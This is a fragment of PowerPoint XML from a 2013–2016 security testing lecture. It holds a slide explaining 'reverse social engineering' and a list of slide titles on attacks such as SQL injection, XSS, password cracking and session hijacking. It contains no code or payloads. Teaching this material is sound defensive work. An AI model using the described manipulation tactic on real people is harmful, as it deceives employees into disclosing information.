          <a:p>
            <a:endParaRPr lang="bg-BG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3302772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Social Engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A final, more advanced method of gaining illicit information is known as “reverse social engineering”. This is when the hacker creates a persona that appears to be in a position of authority so that employees will ask him for information, rather than the other way around</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Includes three phases: sabotage, advertising, assisting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1024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324600" y="5093854"/>
            <a:ext cx="1943100" cy="19431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22548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Security Vulnerability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a:t>Questions?</a:t>
            </a:r>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chemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a: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a:solidFill>
                  <a:srgbClr val="FFBF8B"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a: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a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a: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a:solidFill>
                  <a:srgbClr val="FF831D"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a: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a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a: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a:solidFill>
                  <a:srgbClr val="FF4A37"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="60000" endA="900" endPos="60000" dist="29997" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a: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a:solidFill>
                  <a:srgbClr val="9966FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a: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a:solidFill>
                  <a:srgbClr val="FF6699"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a: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a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1437992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836725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13801</TotalTime>
  <Words>3296</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>704</Paragraphs>
  <Slides>95</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Calibri</vt:lpstr>
      <vt:lpstr>Cambria</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Corbel</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Telerik Academy Theme</vt:lpstr>
      <vt:lpstr>Security Vulnerability Testing</vt:lpstr>
      <vt:lpstr>The Lectors</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Security Vulnerability Testing</vt:lpstr>
      <vt:lpstr>Security Testing</vt:lpstr>
      <vt:lpstr>The Bug Hypothesis</vt:lpstr>
      <vt:lpstr>The Bug Hypothesis (2)</vt:lpstr>
      <vt:lpstr>Feature or Bug</vt:lpstr>
      <vt:lpstr>Vulnerability Categories</vt:lpstr>
      <vt:lpstr>Intended vs. Implemented</vt:lpstr>
      <vt:lpstr>Reasons for Failures</vt:lpstr>
      <vt:lpstr>Security Testing in the Software Development Life Cycle</vt:lpstr>
      <vt:lpstr>Security Testing in the Software Development Life Cycle</vt:lpstr>
      <vt:lpstr>Characteristics of a Secure Software    </vt:lpstr>
      <vt:lpstr>Secure Software Characteristics</vt:lpstr>
      <vt:lpstr>Secure Software Characteristics (2)</vt:lpstr>
      <vt:lpstr>Threat Modeling</vt:lpstr>
      <vt:lpstr>Is Your Application “Secure”?</vt:lpstr>
      <vt:lpstr>What Does “Secure Enough” Mean to You?</vt:lpstr>
      <vt:lpstr>What is Threat Modeling?</vt:lpstr>
      <vt:lpstr>Threat Modeling Concepts</vt:lpstr>
      <vt:lpstr>Approaches to Threat Modeling</vt:lpstr>
      <vt:lpstr>Threat Modeling Steps</vt:lpstr>
      <vt:lpstr>Threat Ranking</vt:lpstr>
      <vt:lpstr>Popular Software Attacks</vt:lpstr>
      <vt:lpstr>Famous security breaches</vt:lpstr>
      <vt:lpstr>            Popular Software Attacks</vt:lpstr>
      <vt:lpstr>            Popular Software Attacks [2]</vt:lpstr>
      <vt:lpstr>Security Organizations</vt:lpstr>
      <vt:lpstr>Security Organizations [2]</vt:lpstr>
      <vt:lpstr>SANS Top 15 Most Dangerous Vulnerabilities</vt:lpstr>
      <vt:lpstr>SANS Top 15 Most Dangerous Vulnerabilities (2)</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection Example</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Preventing SQL Injection</vt:lpstr>
      <vt:lpstr>OS Command Injection</vt:lpstr>
      <vt:lpstr>OS Command Injection (2)</vt:lpstr>
      <vt:lpstr>XSS – Cross-site Scripting</vt:lpstr>
      <vt:lpstr>Why XSS is dangerous?</vt:lpstr>
      <vt:lpstr>Types of XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Preventing XSS</vt:lpstr>
      <vt:lpstr>Acunetix Vulnerability Scanner</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Buffer Overflow </vt:lpstr>
      <vt:lpstr>Buffer Overflow - The Usual Victims</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Wireshark</vt:lpstr>
      <vt:lpstr>What is Wireshark?</vt:lpstr>
      <vt:lpstr>Wireshark</vt:lpstr>
      <vt:lpstr>Password Attacks</vt:lpstr>
      <vt:lpstr>Types of Password Attacks</vt:lpstr>
      <vt:lpstr>Most Frequently Used Passwords</vt:lpstr>
      <vt:lpstr>Users &amp; Passwords</vt:lpstr>
      <vt:lpstr>THC-Hydra</vt:lpstr>
      <vt:lpstr>What is THC-Hydra?</vt:lpstr>
      <vt:lpstr>Protocols supported?</vt:lpstr>
      <vt:lpstr>Type of attacks?</vt:lpstr>
      <vt:lpstr>How to install?</vt:lpstr>
      <vt:lpstr>THC-Hydra</vt:lpstr>
      <vt:lpstr>Denial of Service Attack (DoS)</vt:lpstr>
      <vt:lpstr>Distributed Denial-of-service (DDoS) Attacks </vt:lpstr>
      <vt:lpstr>Preventing DoS</vt:lpstr>
      <vt:lpstr>Preventing DoS (2)</vt:lpstr>
      <vt:lpstr>Open Redirect</vt:lpstr>
      <vt:lpstr>URL Manipulation Attacks</vt:lpstr>
      <vt:lpstr>Why URL manipulation?</vt:lpstr>
      <vt:lpstr>URL Manipulation Example</vt:lpstr>
      <vt:lpstr>URL Manipulation Example</vt:lpstr>
      <vt:lpstr>URL Manipulation Example</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>Error Messages</vt:lpstr>
      <vt:lpstr>Error Messages</vt:lpstr>
      <vt:lpstr>IP Spoofing</vt:lpstr>
      <vt:lpstr>Session Hijacking</vt:lpstr>
      <vt:lpstr>Spoofing vs. Hijacking</vt:lpstr>
      <vt:lpstr>Spoofing vs. Hijacking (2)</vt:lpstr>
      <vt:lpstr>Spoofing vs. Hijacking (3)</vt:lpstr>
      <vt:lpstr>Session Hijacking Methods</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Protecting Against Session Hijacking</vt:lpstr>
      <vt:lpstr>Social Engineering</vt:lpstr>
      <vt:lpstr>Popular Social Engineering Methods</vt:lpstr>
      <vt:lpstr>Phishing</vt:lpstr>
      <vt:lpstr>Malicious E-mail Attachments</vt:lpstr>
      <vt:lpstr>Pharming</vt:lpstr>
      <vt:lpstr>“Dumpster Diving”</vt:lpstr>
      <vt:lpstr>Deception and Manipulation</vt:lpstr>
      <vt:lpstr>“Shoulder Surfing”</vt:lpstr>
      <vt:lpstr>PBX Disguise</vt:lpstr>
      <vt:lpstr>Reverse Social Engineering</vt:lpstr>
      <vt:lpstr>Security Vulnerability Testing</vt:lpstr>
      <vt:lpstr>Free Trainings @ Telerik Academy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Vulnerability Testing</dc:title>
  <dc:creator>Asya Georgieva</dc:creator>
  <cp:lastModifiedBy>Asya Georgieva</cp:lastModifiedBy>
  <cp:revision>102</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-05-02T08:11:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-01-27T09:33:59Z</dcterms:modified>
</cp:coreProperties>
</file>